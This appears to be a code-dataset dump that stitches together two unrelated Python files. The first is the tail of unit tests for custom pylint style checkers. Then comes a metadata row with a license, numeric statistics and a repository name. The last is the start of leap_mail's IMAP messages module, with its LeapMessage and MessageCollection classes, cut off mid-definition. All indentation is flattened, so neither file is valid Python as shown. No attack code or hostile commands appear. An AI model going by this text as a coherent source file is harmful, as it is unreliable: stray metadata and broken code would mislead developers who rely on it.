self.checker_test_object.checker.visit_yield(
yield_in_multiline_file)
# No errors on yield statements in multi-line comments.
with self.checker_test_object.assertNoMessages():
temp_file.close()
def test_too_many_spaces_after_yield_statement(self):
node_too_many_spaces_after_yield_file = astroid.scoped_nodes.Module(
name='test',
doc='Custom test')
temp_file = tempfile.NamedTemporaryFile()
filename = temp_file.name
with python_utils.open_file(filename, 'w') as tmp:
tmp.write(
u"""def helloworld():
yield (5, 2)
""")
node_too_many_spaces_after_yield_file.file = filename
node_too_many_spaces_after_yield_file.path = filename
node_too_many_spaces_after_yield_file.fromlineno = 2
self.checker_test_object.checker.visit_yield(
node_too_many_spaces_after_yield_file)
message = testutils.Message(
msg_id='single-space-after-yield',
node=node_too_many_spaces_after_yield_file)
with self.checker_test_object.assertAddsMessages(message):
temp_file.close()
def test_no_space_after_yield_statement(self):
node_no_spaces_after_yield_file = astroid.scoped_nodes.Module(
name='test',
doc='Custom test')
temp_file = tempfile.NamedTemporaryFile()
filename = temp_file.name
with python_utils.open_file(filename, 'w') as tmp:
tmp.write(
u"""def helloworld():
yield(5, 2)
""")
node_no_spaces_after_yield_file.file = filename
node_no_spaces_after_yield_file.path = filename
node_no_spaces_after_yield_file.fromlineno = 2
self.checker_test_object.checker.visit_yield(
node_no_spaces_after_yield_file)
message = testutils.Message(
msg_id='single-space-after-yield',
node=node_no_spaces_after_yield_file)
with self.checker_test_object.assertAddsMessages(message):
temp_file.close()
class DivisionOperatorCheckerTests(unittest.TestCase):
def setUp(self):
super(DivisionOperatorCheckerTests, self).setUp()
self.checker_test_object = testutils.CheckerTestCase()
self.checker_test_object.CHECKER_CLASS = (
pylint_extensions.DivisionOperatorChecker)
self.checker_test_object.setup_method()
def test_division_operator_with_spaces(self):
node_division_operator_with_spaces = astroid.extract_node(
u"""
a / b #@
""")
message = testutils.Message(
msg_id='division-operator-used',
node=node_division_operator_with_spaces)
with self.checker_test_object.assertAddsMessages(message):
self.checker_test_object.checker.visit_binop(
node_division_operator_with_spaces)
def test_division_operator_without_spaces(self):
node_division_operator_without_spaces = astroid.extract_node(
u"""
a/b #@
""")
message = testutils.Message(
msg_id='division-operator-used',
node=node_division_operator_without_spaces)
with self.checker_test_object.assertAddsMessages(message):
self.checker_test_object.checker.visit_binop(
node_division_operator_without_spaces)
class SingleLineCommentCheckerTests(unittest.TestCase):
def setUp(self):
super(SingleLineCommentCheckerTests, self).setUp()
self.checker_test_object = testutils.CheckerTestCase()
self.checker_test_object.CHECKER_CLASS = (
pylint_extensions.SingleLineCommentChecker)
self.checker_test_object.setup_method()
def test_invalid_punctuation(self):
node_invalid_punctuation = astroid.scoped_nodes.Module(
name='test',
doc='Custom test')
temp_file = tempfile.NamedTemporaryFile()
filename = temp_file.name
with python_utils.open_file(filename, 'w') as tmp:
tmp.write(
u"""# This is a multiline
# comment/
# Comment.
""")
node_invalid_punctuation.file = filename
node_invalid_punctuation.path = filename
self.checker_test_object.checker.process_tokens(
utils.tokenize_module(node_invalid_punctuation))
message = testutils.Message(
msg_id='invalid-punctuation-used',
line=2)
with self.checker_test_object.assertAddsMessages(message):
temp_file.close()
def test_no_space_at_beginning(self):
node_no_space_at_beginning = astroid.scoped_nodes.Module(
name='test',
doc='Custom test')
temp_file = tempfile.NamedTemporaryFile()
filename = temp_file.name
with python_utils.open_file(filename, 'w') as tmp:
tmp.write(
u"""#Something.
""")
node_no_space_at_beginning.file = filename
node_no_space_at_beginning.path = filename
self.checker_test_object.checker.process_tokens(
utils.tokenize_module(node_no_space_at_beginning))
message = testutils.Message(
msg_id='no-space-at-beginning',
line=1)
with self.checker_test_object.assertAddsMessages(message):
temp_file.close()
def test_no_capital_letter_at_beginning(self):
node_no_capital_letter_at_beginning = astroid.scoped_nodes.Module(
name='test',
doc='Custom test')
temp_file = tempfile.NamedTemporaryFile()
filename = temp_file.name
with python_utils.open_file(filename, 'w') as tmp:
tmp.write(
u"""# coding: utf-8
# something.
""")
node_no_capital_letter_at_beginning.file = filename
node_no_capital_letter_at_beginning.path = filename
self.checker_test_object.checker.process_tokens(
utils.tokenize_module(node_no_capital_letter_at_beginning))
message = testutils.Message(
msg_id='no-capital-letter-at-beginning',
line=3)
with self.checker_test_object.assertAddsMessages(message):
temp_file.close()
def test_comment_with_excluded_phrase(self):
node_comment_with_excluded_phrase = astroid.scoped_nodes.Module(
name='test',
doc='Custom test')
temp_file = tempfile.NamedTemporaryFile()
filename = temp_file.name
with python_utils.open_file(filename, 'w') as tmp:
tmp.write(
u"""# coding: utf-8
# pylint: disable
a = 1 + 2 # pylint: disable
""")
node_comment_with_excluded_phrase.file = filename
node_comment_with_excluded_phrase.path = filename
self.checker_test_object.checker.process_tokens(
utils.tokenize_module(node_comment_with_excluded_phrase))
with self.checker_test_object.assertNoMessages():
temp_file.close()
def test_variable_name_in_comment(self):
node_variable_name_in_comment = astroid.scoped_nodes.Module(
name='test',
doc='Custom test')
temp_file = tempfile.NamedTemporaryFile()
filename = temp_file.name
with python_utils.open_file(filename, 'w') as tmp:
tmp.write(
u"""# coding: utf-8
# variable_name is used.
""")
node_variable_name_in_comment.file = filename
node_variable_name_in_comment.path = filename
self.checker_test_object.checker.process_tokens(
utils.tokenize_module(node_variable_name_in_comment))
with self.checker_test_object.assertNoMessages():
temp_file.close()
def test_comment_with_version_info(self):
node_comment_with_version_info = astroid.scoped_nodes.Module(
name='test',
doc='Custom test')
temp_file = tempfile.NamedTemporaryFile()
filename = temp_file.name
with python_utils.open_file(filename, 'w') as tmp:
tmp.write(
u"""# coding: utf-8
# v2 is used.
""")
node_comment_with_version_info.file = filename
node_comment_with_version_info.path = filename
self.checker_test_object.checker.process_tokens(
utils.tokenize_module(node_comment_with_version_info))
with self.checker_test_object.assertNoMessages():
temp_file.close()
def test_data_type_in_comment(self):
node_data_type_in_comment = astroid.scoped_nodes.Module(
name='test',
doc='Custom test')
temp_file = tempfile.NamedTemporaryFile()
filename = temp_file.name
with python_utils.open_file(filename, 'w') as tmp:
tmp.write(
u"""# coding: utf-8
# str. variable is type of str.
""")
node_data_type_in_comment.file = filename
node_data_type_in_comment.path = filename
self.checker_test_object.checker.process_tokens(
utils.tokenize_module(node_data_type_in_comment))
with self.checker_test_object.assertNoMessages():
temp_file.close()
def test_comment_inside_docstring(self):
node_comment_inside_docstring = astroid.scoped_nodes.Module(
name='test',
doc='Custom test')
temp_file = tempfile.NamedTemporaryFile()
filename = temp_file.name
with python_utils.open_file(filename, 'w') as tmp:
tmp.write(
u"""# coding: utf-8
\"\"\"# str. variable is type of str.\"\"\"
\"\"\"# str. variable is type
of str.\"\"\"
""")
node_comment_inside_docstring.file = filename
node_comment_inside_docstring.path = filename
self.checker_test_object.checker.process_tokens(
utils.tokenize_module(node_comment_inside_docstring))
with self.checker_test_object.assertNoMessages():
temp_file.close()
def test_well_formed_comment(self):
node_with_no_error_message = astroid.scoped_nodes.Module(
name='test',
doc='Custom test')
temp_file = tempfile.NamedTemporaryFile()
filename = temp_file.name
with python_utils.open_file(filename, 'w') as tmp:
tmp.write(
u"""# coding: utf-8
# Multi
# line
# comment.
""")
node_with_no_error_message.file = filename
node_with_no_error_message.path = filename
self.checker_test_object.checker.process_tokens(
utils.tokenize_module(node_with_no_error_message))
with self.checker_test_object.assertNoMessages():
temp_file.close()
class BlankLineBelowFileOverviewCheckerTests(unittest.TestCase):
def setUp(self):
super(BlankLineBelowFileOverviewCheckerTests, self).setUp()
self.checker_test_object = testutils.CheckerTestCase()
self.checker_test_object.CHECKER_CLASS = (
pylint_extensions.BlankLineBelowFileOverviewChecker)
self.checker_test_object.setup_method()
def test_no_empty_line_below_fileoverview(self):
node_no_empty_line_below_fileoverview = astroid.scoped_nodes.Module(
name='test',
doc='Custom test')
temp_file = tempfile.NamedTemporaryFile()
filename = temp_file.name
with python_utils.open_file(filename, 'w') as tmp:
tmp.write(
u"""
\"\"\" this file does something \"\"\"
import something
import random
""")
node_no_empty_line_below_fileoverview.file = filename
node_no_empty_line_below_fileoverview.path = filename
node_no_empty_line_below_fileoverview.fromlineno = 2
self.checker_test_object.checker.visit_module(
node_no_empty_line_below_fileoverview)
message = testutils.Message(
msg_id='no-empty-line-provided-below-fileoverview',
node=node_no_empty_line_below_fileoverview)
with self.checker_test_object.assertAddsMessages(message):
temp_file.close()
def test_extra_empty_lines_below_fileoverview(self):
node_extra_empty_lines_below_fileoverview = astroid.scoped_nodes.Module(
name='test',
doc='Custom test')
temp_file = tempfile.NamedTemporaryFile()
filename = temp_file.name
with python_utils.open_file(filename, 'w') as tmp:
tmp.write(
u"""
\"\"\" this file does something \"\"\"
import something
from something import random
""")
node_extra_empty_lines_below_fileoverview.file = filename
node_extra_empty_lines_below_fileoverview.path = filename
node_extra_empty_lines_below_fileoverview.fromlineno = 2
self.checker_test_object.checker.visit_module(
node_extra_empty_lines_below_fileoverview)
message = testutils.Message(
msg_id='only-a-single-empty-line-should-be-provided',
node=node_extra_empty_lines_below_fileoverview)
with self.checker_test_object.assertAddsMessages(message):
temp_file.close()
def test_extra_empty_lines_below_fileoverview_with_unicode_characters(self):
node_extra_empty_lines_below_fileoverview = astroid.scoped_nodes.Module(
name='test',
doc='Custom test')
temp_file = tempfile.NamedTemporaryFile()
filename = temp_file.name
with python_utils.open_file(filename, 'w') as tmp:
tmp.write(
u"""
#this comment has a unicode character \u2713
\"\"\" this file does \u2715 something \"\"\"
from something import random
""")
node_extra_empty_lines_below_fileoverview.file = filename
node_extra_empty_lines_below_fileoverview.path = filename
node_extra_empty_lines_below_fileoverview.fromlineno = 3
self.checker_test_object.checker.visit_module(
node_extra_empty_lines_below_fileoverview)
message = testutils.Message(
msg_id='only-a-single-empty-line-should-be-provided',
node=node_extra_empty_lines_below_fileoverview)
with self.checker_test_object.assertAddsMessages(message):
temp_file.close()
def test_no_empty_line_below_fileoverview_with_unicode_characters(self):
node_no_empty_line_below_fileoverview = astroid.scoped_nodes.Module(
name='test',
doc='Custom test')
temp_file = tempfile.NamedTemporaryFile()
filename = temp_file.name
with python_utils.open_file(filename, 'w') as tmp:
tmp.write(
u"""
#this comment has a unicode character \u2713
\"\"\" this file does \u2715 something \"\"\"
import something
import random
""")
node_no_empty_line_below_fileoverview.file = filename
node_no_empty_line_below_fileoverview.path = filename
node_no_empty_line_below_fileoverview.fromlineno = 3
self.checker_test_object.checker.visit_module(
node_no_empty_line_below_fileoverview)
message = testutils.Message(
msg_id='no-empty-line-provided-below-fileoverview',
node=node_no_empty_line_below_fileoverview)
with self.checker_test_object.assertAddsMessages(message):
temp_file.close()
def test_single_new_line_below_file_overview(self):
node_with_no_error_message = astroid.scoped_nodes.Module(
name='test',
doc='Custom test')
temp_file = tempfile.NamedTemporaryFile()
filename = temp_file.name
with python_utils.open_file(filename, 'w') as tmp:
tmp.write(
u"""
\"\"\" this file does something \"\"\"
import something
import random
""")
node_with_no_error_message.file = filename
node_with_no_error_message.path = filename
node_with_no_error_message.fromlineno = 2
self.checker_test_object.checker.visit_module(
node_with_no_error_message)
with self.checker_test_object.assertNoMessages():
temp_file.close()
def test_file_with_no_file_overview(self):
node_file_with_no_file_overview = astroid.scoped_nodes.Module(
name='test',
doc=None)
temp_file = tempfile.NamedTemporaryFile()
filename = temp_file.name
with python_utils.open_file(filename, 'w') as tmp:
tmp.write(
u"""
import something
import random
""")
node_file_with_no_file_overview.file = filename
node_file_with_no_file_overview.path = filename
self.checker_test_object.checker.visit_module(
node_file_with_no_file_overview)
with self.checker_test_object.assertNoMessages():
temp_file.close()
def test_file_overview_at_end_of_file(self):
node_file_overview_at_end_of_file = astroid.scoped_nodes.Module(
name='test',
doc='Custom test')
temp_file = tempfile.NamedTemporaryFile()
filename = temp_file.name
with python_utils.open_file(filename, 'w') as tmp:
tmp.write(
u"""
\"\"\" this file does something \"\"\" """)
node_file_overview_at_end_of_file.file = filename
node_file_overview_at_end_of_file.path = filename
node_file_overview_at_end_of_file.fromlineno = 2
self.checker_test_object.checker.visit_module(
node_file_overview_at_end_of_file)
message = testutils.Message(
msg_id='only-a-single-empty-line-should-be-provided',
node=node_file_overview_at_end_of_file)
with self.checker_test_object.assertAddsMessages(message):
temp_file.close()
class SingleLinePragmaCheckerTests(unittest.TestCase):
def setUp(self):
super(SingleLinePragmaCheckerTests, self).setUp()
self.checker_test_object = testutils.CheckerTestCase()
self.checker_test_object.CHECKER_CLASS = (
pylint_extensions.SingleLinePragmaChecker)
self.checker_test_object.setup_method()
def test_pragma_for_multiline(self):
node_pragma_for_multiline = astroid.scoped_nodes.Module(
name='test',
doc='Custom test')
temp_file = tempfile.NamedTemporaryFile()
filename = temp_file.name
with python_utils.open_file(filename, 'w') as tmp:
tmp.write(
u"""
# pylint: disable=invalid-name
def funcName():
\"\"\" # pylint: disable=test-purpose\"\"\"
pass
# pylint: enable=invalid-name
""")
node_pragma_for_multiline.file = filename
node_pragma_for_multiline.path = filename
self.checker_test_object.checker.process_tokens(
utils.tokenize_module(node_pragma_for_multiline))
message1 = testutils.Message(
msg_id='single-line-pragma',
line=2)
message2 = testutils.Message(
msg_id='single-line-pragma',
line=6)
with self.checker_test_object.assertAddsMessages(
message1, message2):
temp_file.close()
def test_enable_single_line_pragma_for_multiline(self):
node_enable_single_line_pragma_for_multiline = (
astroid.scoped_nodes.Module(name='test', doc='Custom test'))
temp_file = tempfile.NamedTemporaryFile()
filename = temp_file.name
with python_utils.open_file(filename, 'w') as tmp:
tmp.write(
u"""
# pylint: disable=single-line-pragma
def func():
\"\"\"
# pylint: disable=testing-purpose
\"\"\"
pass
# pylint: enable=single-line-pragma
""")
node_enable_single_line_pragma_for_multiline.file = filename
node_enable_single_line_pragma_for_multiline.path = filename
self.checker_test_object.checker.process_tokens(
utils.tokenize_module(node_enable_single_line_pragma_for_multiline))
message = testutils.Message(
msg_id='single-line-pragma',
line=2)
with self.checker_test_object.assertAddsMessages(message):
temp_file.close()
def test_enable_single_line_pragma_with_invalid_name(self):
node_enable_single_line_pragma_with_invalid_name = (
astroid.scoped_nodes.Module(name='test', doc='Custom test'))
temp_file = tempfile.NamedTemporaryFile()
filename = temp_file.name
with python_utils.open_file(filename, 'w') as tmp:
tmp.write(
u"""
# pylint: disable=invalid-name, single-line-pragma
def funcName():
\"\"\"
# pylint: disable=testing-purpose
\"\"\"
pass
# pylint: enable=invalid_name, single-line-pragma
""")
node_enable_single_line_pragma_with_invalid_name.file = filename
node_enable_single_line_pragma_with_invalid_name.path = filename
self.checker_test_object.checker.process_tokens(
utils.tokenize_module(
node_enable_single_line_pragma_with_invalid_name))
message = testutils.Message(
msg_id='single-line-pragma',
line=2)
with self.checker_test_object.assertAddsMessages(message):
temp_file.close()
def test_single_line_pylint_pragma(self):
node_with_no_error_message = (
astroid.scoped_nodes.Module(name='test', doc='Custom test'))
temp_file = tempfile.NamedTemporaryFile()
filename = temp_file.name
with python_utils.open_file(filename, 'w') as tmp:
tmp.write(
u"""
def funcName(): # pylint: disable=single-line-pragma
pass
""")
node_with_no_error_message.file = filename
node_with_no_error_message.path = filename
self.checker_test_object.checker.process_tokens(
utils.tokenize_module(node_with_no_error_message))
with self.checker_test_object.assertNoMessages():
temp_file.close()
def test_no_and_extra_space_before_pylint(self):
node_no_and_extra_space_before_pylint = (
astroid.scoped_nodes.Module(name='test', doc='Custom test'))
temp_file = tempfile.NamedTemporaryFile()
filename = temp_file.name
with python_utils.open_file(filename, 'w') as tmp:
tmp.write(
u"""
# pylint:disable=single-line-pragma
def func():
\"\"\"
# pylint: disable=testing-purpose
\"\"\"
pass
# pylint: enable=single-line-pragma
""")
node_no_and_extra_space_before_pylint.file = filename
node_no_and_extra_space_before_pylint.path = filename
self.checker_test_object.checker.process_tokens(
utils.tokenize_module(node_no_and_extra_space_before_pylint))
message = testutils.Message(
msg_id='single-line-pragma',
line=2)
with self.checker_test_object.assertAddsMessages(message):
temp_file.close()
|
apache-2.0
| -8,516,299,864,697,384,000 | 35.07111 | 100 | 0.549699 | false |
kalikaneko/leap_mail
|
src/leap/mail/imap/messages.py
|
1
|
45971
|
# -*- coding: utf-8 -*-
# messages.py
# Copyright (C) 2013 LEAP
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
LeapMessage and MessageCollection.
"""
import copy
import logging
import re
import threading
import StringIO
from collections import defaultdict
from functools import partial
from twisted.mail import imap4
from twisted.internet import defer
from twisted.python import log
from zope.interface import implements
from zope.proxy import sameProxiedObjects
from leap.common.check import leap_assert, leap_assert_type
from leap.common.decorators import memoized_method
from leap.common.mail import get_email_charset
from leap.mail import walk
from leap.mail.utils import first, find_charset, lowerdict, empty
from leap.mail.utils import stringify_parts_map
from leap.mail.decorators import deferred_to_thread
from leap.mail.imap.index import IndexedDB
from leap.mail.imap.fields import fields, WithMsgFields
from leap.mail.imap.memorystore import MessageWrapper
from leap.mail.imap.messageparts import MessagePart
from leap.mail.imap.parser import MailParser, MBoxParser
logger = logging.getLogger(__name__)
# TODO ------------------------------------------------------------
# [ ] Add ref to incoming message during add_msg
# [ ] Add linked-from info.
# * Need a new type of documents: linkage info.
# * HDOCS are linked from FDOCs (ref to chash)
# * CDOCS are linked from HDOCS (ref to chash)
# [ ] Delete incoming mail only after successful write!
# [ ] Remove UID from syncable db. Store only those indexes locally.
MSGID_PATTERN = r"""<([\w@.]+)>"""
MSGID_RE = re.compile(MSGID_PATTERN)
def try_unique_query(curried):
"""
Try to execute a query that is expected to have a
single outcome, and log a warning if more than one document found.
:param curried: a curried function
:type curried: callable
"""
leap_assert(callable(curried), "A callable is expected")
try:
query = curried()
if query:
if len(query) > 1:
# TODO we could take action, like trigger a background
# process to kill dupes.
name = getattr(curried, 'expected', 'doc')
logger.warning(
"More than one %s found for this mbox, "
"we got a duplicate!!" % (name,))
return query.pop()
else:
return None
except Exception as exc:
logger.exception("Unhandled error %r" % exc)
class LeapMessage(fields, MailParser, MBoxParser):
"""
The main representation of a message.
It indexes the messages in one mailbox by a combination
of uid+mailbox name.
"""
# TODO this has to change.
# Should index primarily by chash, and keep a local-only
# UID table.
implements(imap4.IMessage)
flags_lock = threading.Lock()
def __init__(self, soledad, uid, mbox, collection=None, container=None):
"""
Initializes a LeapMessage.
:param soledad: a Soledad instance
:type soledad: Soledad
:param uid: the UID for the message.
:type uid: int or basestring
:param mbox: the mbox this message belongs to
:type mbox: str or unicode
:param collection: a reference to the parent collection object
:type collection: MessageCollection
:param container: a IMessageContainer implementor instance
:type container: IMessageContainer
"""
MailParser.__init__(self)
self._soledad = soledad
self._uid = int(uid)
self._mbox = self._parse_mailbox_name(mbox)
self._collection = collection
self._container = container
self.__chash = None
self.__bdoc = None
# XXX make these properties public
@property
def _fdoc(self):
"""
An accessor to the flags document.
"""
if all(map(bool, (self._uid, self._mbox))):
fdoc = None
if self._container is not None:
fdoc = self._container.fdoc
if not fdoc:
fdoc = self._get_flags_doc()
if fdoc:
fdoc_content = fdoc.content
self.__chash = fdoc_content.get(
fields.CONTENT_HASH_KEY, None)
return fdoc
@property
def _hdoc(self):
"""
An accessor to the headers document.
"""
if self._container is not None:
hdoc = self._container.hdoc
if hdoc and not empty(hdoc.content):
return hdoc
# XXX cache this into the memory store !!!
return self._get_headers_doc()
@property
def _chash(self):
"""
An accessor to the content hash for this message.
"""
if not self._fdoc:
return None
if not self.__chash and self._fdoc:
self.__chash = self._fdoc.content.get(
fields.CONTENT_HASH_KEY, None)
return self.__chash
@property
def _bdoc(self):
"""
An accessor to the body document.
"""
if not self._hdoc:
return None
if not self.__bdoc:
self.__bdoc = self._get_body_doc()
return self.__bdoc
# IMessage implementation
def getUID(self):
"""
Retrieve the unique identifier associated with this Message.
:return: uid for this message
:rtype: int
"""
return self._uid
def getFlags(self):
"""
Retrieve the flags associated with this Message.
:return: The flags, represented as strings
:rtype: tuple
"""
uid = self._uid
flags = set([])
fdoc = self._fdoc
if fdoc:
flags = set(fdoc.content.get(self.FLAGS_KEY, None))
msgcol = self._collection
# We treat the recent flag specially: gotten from
# a mailbox-level document.
if msgcol and uid in msgcol.recent_flags:
flags.add(fields.RECENT_FLAG)
if flags:
flags = map(str, flags)
return tuple(flags)
# setFlags not in the interface spec but we use it with store command.
def setFlags(self, flags, mode):
"""
Sets the flags for this message
:param flags: the flags to update in the message.
:type flags: tuple of str
:param mode: the mode for setting. 1 is append, -1 is remove, 0 set.
:type mode: int
"""
leap_assert(isinstance(flags, tuple), "flags need to be a tuple")
log.msg('setting flags: %s (%s)' % (self._uid, flags))
doc = self._fdoc
if not doc:
logger.warning(
"Could not find FDOC for %s:%s while setting flags!" %
(self._mbox, self._uid))
return
APPEND = 1
REMOVE = -1
SET = 0
with self.flags_lock:
current = doc.content[self.FLAGS_KEY]
if mode == APPEND:
newflags = tuple(set(tuple(current) + flags))
elif mode == REMOVE:
newflags = tuple(set(current).difference(set(flags)))
elif mode == SET:
newflags = flags
# We could defer this, but I think it's better
# to put it under the lock...
doc.content[self.FLAGS_KEY] = newflags
doc.content[self.SEEN_KEY] = self.SEEN_FLAG in flags
doc.content[self.DEL_KEY] = self.DELETED_FLAG in flags
if self._collection.memstore is not None:
log.msg("putting message in collection")
self._collection.memstore.put_message(
self._mbox, self._uid,
MessageWrapper(fdoc=doc.content, new=False, dirty=True,
docs_id={'fdoc': doc.doc_id}))
else:
# fallback for non-memstore initializations.
self._soledad.put_doc(doc)
return map(str, newflags)
def getInternalDate(self):
"""
Retrieve the date internally associated with this message
:rtype: C{str}
:return: An RFC822-formatted date string.
"""
date = self._hdoc.content.get(self.DATE_KEY, '')
return str(date)
#
# IMessagePart
#
# XXX we should implement this interface too for the subparts
# so we allow nested parts...
def getBodyFile(self):
"""
Retrieve a file object containing only the body of this message.
:return: file-like object opened for reading
:rtype: StringIO
"""
def write_fd(body):
fd.write(body)
fd.seek(0)
return fd
# TODO refactor with getBodyFile in MessagePart
fd = StringIO.StringIO()
if self._bdoc is not None:
bdoc_content = self._bdoc.content
if empty(bdoc_content):
logger.warning("No BDOC content found for message!!!")
return write_fd("")
body = bdoc_content.get(self.RAW_KEY, "")
content_type = bdoc_content.get('content-type', "")
charset = find_charset(content_type)
logger.debug('got charset from content-type: %s' % charset)
if charset is None:
charset = self._get_charset(body)
try:
if isinstance(body, unicode):
body = body.encode(charset)
except UnicodeError as exc:
logger.error(
"Unicode error, using 'replace'. {0!r}".format(exc))
logger.debug("Attempted to encode with: %s" % charset)
body = body.encode(charset, 'replace')
finally:
return write_fd(body)
# We are still returning funky characters from here.
else:
logger.warning("No BDOC found for message.")
return write_fd("")
@memoized_method
def _get_charset(self, stuff):
"""
Gets (guesses?) the charset of a payload.
:param stuff: the stuff to guess about.
:type stuff: basestring
:returns: charset
"""
# XXX shouldn't we make the scope
# of the decorator somewhat more persistent?
# ah! yes! and put memory bounds.
return get_email_charset(stuff)
def getSize(self):
"""
Return the total size, in octets, of this message.
:return: size of the message, in octets
:rtype: int
"""
size = None
if self._fdoc:
fdoc_content = self._fdoc.content
size = fdoc_content.get(self.SIZE_KEY, False)
else:
logger.warning("No FLAGS doc for %s:%s" % (self._mbox,
self._uid))
if not size:
# XXX fallback, should remove when all migrated.
size = self.getBodyFile().len
return size
def getHeaders(self, negate, *names):
"""
Retrieve a group of message headers.
:param names: The names of the headers to retrieve or omit.
:type names: tuple of str
:param negate: If True, indicates that the headers listed in names
should be omitted from the return value, rather
than included.
:type negate: bool
:return: A mapping of header field names to header field values
:rtype: dict
"""
# TODO split in smaller methods
# XXX refactor together with MessagePart method
headers = self._get_headers()
if not headers:
logger.warning("No headers found")
return {str('content-type'): str('')}
names = map(lambda s: s.upper(), names)
if negate:
cond = lambda key: key.upper() not in names
else:
cond = lambda key: key.upper() in names
if isinstance(headers, list):
headers = dict(headers)
# default to most likely standard
charset = find_charset(headers, "utf-8")
headers2 = dict()
for key, value in headers.items():
# twisted imap server expects *some* headers to be lowercase
# We could use a CaseInsensitiveDict here...
if key.lower() == "content-type":
key = key.lower()
if not isinstance(key, str):
key = key.encode(charset, 'replace')
if not isinstance(value, str):
value = value.encode(charset, 'replace')
if value.endswith(";"):
# bastards
value = value[:-1]
# filter original dict by negate-condition
if cond(key):
headers2[key] = value
return headers2
def _get_headers(self):
"""
Return the headers dict for this message.
"""
if self._hdoc is not None:
hdoc_content = self._hdoc.content
headers = hdoc_content.get(self.HEADERS_KEY, {})
return headers
else:
logger.warning(
"No HEADERS doc for msg %s:%s" % (
self._mbox,
self._uid))
def isMultipart(self):
"""
Return True if this message is multipart.
"""
if self._fdoc:
fdoc_content = self._fdoc.content
is_multipart = fdoc_content.get(self.MULTIPART_KEY, False)
return is_multipart
else:
logger.warning(
"No FLAGS doc for msg %s:%s" % (
self._mbox,
self._uid))
def getSubPart(self, part):
"""
Retrieve a MIME submessage
:type part: C{int}
:param part: The number of the part to retrieve, indexed from 0.
:raise IndexError: Raised if the specified part does not exist.
:raise TypeError: Raised if this message is not multipart.
:rtype: Any object implementing C{IMessagePart}.
:return: The specified sub-part.
"""
if not self.isMultipart():
raise TypeError
try:
pmap_dict = self._get_part_from_parts_map(part + 1)
except KeyError:
raise IndexError
return MessagePart(self._soledad, pmap_dict)
#
# accessors
#
def _get_part_from_parts_map(self, part):
"""
Get a part map from the headers doc
:raises: KeyError if key does not exist
:rtype: dict
"""
if not self._hdoc:
logger.warning("Tried to get part but no HDOC found!")
return None
hdoc_content = self._hdoc.content
pmap = hdoc_content.get(fields.PARTS_MAP_KEY, {})
# remember, lads, soledad is using strings in its keys,
# not integers!
return pmap[str(part)]
# XXX moved to memory store
# move the rest too. ------------------------------------------
def _get_flags_doc(self):
"""
Return the document that keeps the flags for this
message.
"""
result = {}
try:
flag_docs = self._soledad.get_from_index(
fields.TYPE_MBOX_UID_IDX,
fields.TYPE_FLAGS_VAL, self._mbox, str(self._uid))
result = first(flag_docs)
except Exception as exc:
# ugh! Something's broken down there!
logger.warning("ERROR while getting flags for UID: %s" % self._uid)
logger.exception(exc)
finally:
return result
def _get_headers_doc(self):
"""
Return the document that keeps the headers for this
message.
"""
head_docs = self._soledad.get_from_index(
fields.TYPE_C_HASH_IDX,
fields.TYPE_HEADERS_VAL, str(self._chash))
return first(head_docs)
def _get_body_doc(self):
"""
Return the document that keeps the body for this
message.
"""
hdoc_content = self._hdoc.content
body_phash = hdoc_content.get(
fields.BODY_KEY, None)
if not body_phash:
logger.warning("No body phash for this document!")
return None
# XXX get from memstore too...
# if memstore: memstore.get_phrash
# memstore should keep a dict with weakrefs to the
# phash doc...
if self._container is not None:
bdoc = self._container.memstore.get_cdoc_from_phash(body_phash)
if not empty(bdoc) and not empty(bdoc.content):
return bdoc
# no memstore, or no body doc found there
if self._soledad:
body_docs = self._soledad.get_from_index(
fields.TYPE_P_HASH_IDX,
fields.TYPE_CONTENT_VAL, str(body_phash))
return first(body_docs)
else:
logger.error("No phash in container, and no soledad found!")
def __getitem__(self, key):
"""
Return an item from the content of the flags document,
for convenience.
:param key: The key
:type key: str
:return: The content value indexed by C{key} or None
:rtype: str
"""
return self._fdoc.content.get(key, None)
def does_exist(self):
"""
Return True if there is actually a flags document for this
UID and mbox.
"""
return not empty(self._fdoc)
class MessageCollection(WithMsgFields, IndexedDB, MailParser, MBoxParser):
"""
A collection of messages, surprisingly.
It is tied to a selected mailbox name that is passed to its constructor.
Implements a filter query over the messages contained in a soledad
database.
"""
# XXX this should be able to produce a MessageSet methinks
# could validate these kinds of objects turning them
# into a template for the class.
FLAGS_DOC = "FLAGS"
HEADERS_DOC = "HEADERS"
CONTENT_DOC = "CONTENT"
"""
RECENT_DOC is a document that stores a list of the UIDs
with the recent flag for this mailbox. It deserves a special treatment
because:
(1) it cannot be set by the user
(2) it's a flag that we set inmediately after a fetch, which is quite
often.
(3) we need to be able to set/unset it in batches without doing a single
write for each element in the sequence.
"""
RECENT_DOC = "RECENT"
"""
HDOCS_SET_DOC is a document that stores a set of the Document-IDs
(the u1db index) for all the headers documents for a given mailbox.
We use it to prefetch massively all the headers for a mailbox.
This is the second massive query, after fetching all the FLAGS, that
a MUA will do in a case where we do not have local disk cache.
"""
HDOCS_SET_DOC = "HDOCS_SET"
templates = {
# Message Level
FLAGS_DOC: {
fields.TYPE_KEY: fields.TYPE_FLAGS_VAL,
fields.UID_KEY: 1, # XXX moe to a local table
fields.MBOX_KEY: fields.INBOX_VAL,
fields.CONTENT_HASH_KEY: "",
fields.SEEN_KEY: False,
fields.DEL_KEY: False,
fields.FLAGS_KEY: [],
fields.MULTIPART_KEY: False,
fields.SIZE_KEY: 0
},
HEADERS_DOC: {
fields.TYPE_KEY: fields.TYPE_HEADERS_VAL,
fields.CONTENT_HASH_KEY: "",
fields.DATE_KEY: "",
fields.SUBJECT_KEY: "",
fields.HEADERS_KEY: {},
fields.PARTS_MAP_KEY: {},
},
CONTENT_DOC: {
fields.TYPE_KEY: fields.TYPE_CONTENT_VAL,
fields.PAYLOAD_HASH_KEY: "",
fields.LINKED_FROM_KEY: [],
fields.CTYPE_KEY: "", # should index by this too
# should only get inmutable headers parts
# (for indexing)
fields.HEADERS_KEY: {},
fields.RAW_KEY: "",
fields.PARTS_MAP_KEY: {},
fields.HEADERS_KEY: {},
fields.MULTIPART_KEY: False,
},
# Mailbox Level
RECENT_DOC: {
fields.TYPE_KEY: fields.TYPE_RECENT_VAL,
fields.MBOX_KEY: fields.INBOX_VAL,
